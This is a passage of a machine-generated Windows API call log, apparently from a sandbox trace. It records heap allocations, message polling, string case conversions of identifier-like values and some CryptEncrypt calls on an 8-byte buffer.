[0113.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa378 | out: hHeap=0x2af0000) returned 1 [0113.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3c0 | out: hHeap=0x2af0000) returned 1 [0113.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0113.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0113.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0113.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0113.709] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0113.709] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0113.709] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0113.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0113.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0113.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4e0 [0113.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0113.709] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa420 [0113.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0113.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa420 | out: hHeap=0x2af0000) returned 1 [0113.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4e0 | out: hHeap=0x2af0000) returned 1 [0113.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0113.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0113.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0113.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0113.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa348 [0113.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0113.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2d0 [0113.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0113.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0113.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa348 | out: hHeap=0x2af0000) returned 1 [0113.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0113.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0113.710] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0113.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73ae8 | out: hHeap=0x2af0000) returned 1 [0113.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0113.710] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0113.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0113.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0113.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0113.710] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0113.710] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0113.710] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0113.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0113.710] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7160 [0113.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7160 | out: hHeap=0x2af0000) returned 1 [0113.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0113.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0113.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0113.711] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0113.711] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0113.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0113.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0113.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0113.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0113.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0113.711] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0113.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0113.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0113.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9fb8 [0113.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0113.711] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0113.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0113.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0113.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa330 [0113.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa378 [0113.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0113.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3c0 [0113.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0113.711] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0113.712] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0113.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0113.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0113.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3c0 | out: hHeap=0x2af0000) returned 1 [0113.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa378 | out: hHeap=0x2af0000) returned 1 [0113.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa330 | out: hHeap=0x2af0000) returned 1 [0113.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0113.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0113.712] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0113.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0113.712] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0113.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0113.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4b0 | out: hHeap=0x2af0000) returned 1 [0113.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa318 | out: hHeap=0x2af0000) returned 1 [0113.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa360 | out: hHeap=0x2af0000) returned 1 [0113.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0113.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0113.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0113.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0113.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0113.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0113.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0113.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0113.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0113.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0113.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0113.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0113.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa510 | out: hHeap=0x2af0000) returned 1 [0113.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa258 | out: hHeap=0x2af0000) returned 1 [0113.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa348 | out: hHeap=0x2af0000) returned 1 [0113.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0113.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0113.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0113.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0113.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0113.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0113.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3f0 | out: hHeap=0x2af0000) returned 1 [0113.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa450 | out: hHeap=0x2af0000) returned 1 [0113.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3d8 | out: hHeap=0x2af0000) returned 1 [0113.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0113.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0113.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0113.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2a0 | out: hHeap=0x2af0000) returned 1 [0113.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0113.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa330 | out: hHeap=0x2af0000) returned 1 [0113.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0113.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0113.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0113.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0113.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0113.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0113.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa330 | out: hHeap=0x2af0000) returned 1 [0113.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0113.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0113.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0113.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0113.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0113.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa330 | out: hHeap=0x2af0000) returned 1 [0113.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0113.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0113.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0113.714] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0113.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0113.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0113.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa330 | out: hHeap=0x2af0000) returned 1 [0113.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0113.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa330 | out: hHeap=0x2af0000) returned 1 [0113.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0113.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa348 | out: hHeap=0x2af0000) returned 1 [0113.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0113.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa330 | out: hHeap=0x2af0000) returned 1 [0113.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0113.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa348 | out: hHeap=0x2af0000) returned 1 [0113.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0113.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa480 | out: hHeap=0x2af0000) returned 1 [0113.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0113.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa330 | out: hHeap=0x2af0000) returned 1 [0113.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0113.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa330 | out: hHeap=0x2af0000) returned 1 [0113.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0113.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa438 | out: hHeap=0x2af0000) returned 1 [0113.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0113.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0113.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0113.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0113.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa348 | out: hHeap=0x2af0000) returned 1 [0113.714] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0113.715] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0113.715] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaa438, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0113.715] CryptEncrypt (in: hKey=0x9a4980, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x8) returned 1 [0113.715] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.715] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.715] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.715] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.715] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0113.715] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.715] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.715] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0113.715] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0113.715] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0113.715] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0113.715] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0113.715] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0113.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0113.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaa2a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0113.716] CryptEncrypt (in: hKey=0x9a4980, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a71a98*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x8 | out: pbData=0x2a71a98*, pdwDataLen=0x8cef60*=0x8) returned 1 [0113.716] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.716] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.716] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.716] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.716] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.716] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.716] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0113.716] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0113.716] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0113.716] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0113.716] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0113.716] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0113.716] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0113.716] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0113.716] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0113.716] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0113.716] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0113.716] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0113.716] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0113.717] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0113.717] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0113.717] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0113.717] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0113.850] PeekMessageW (in: 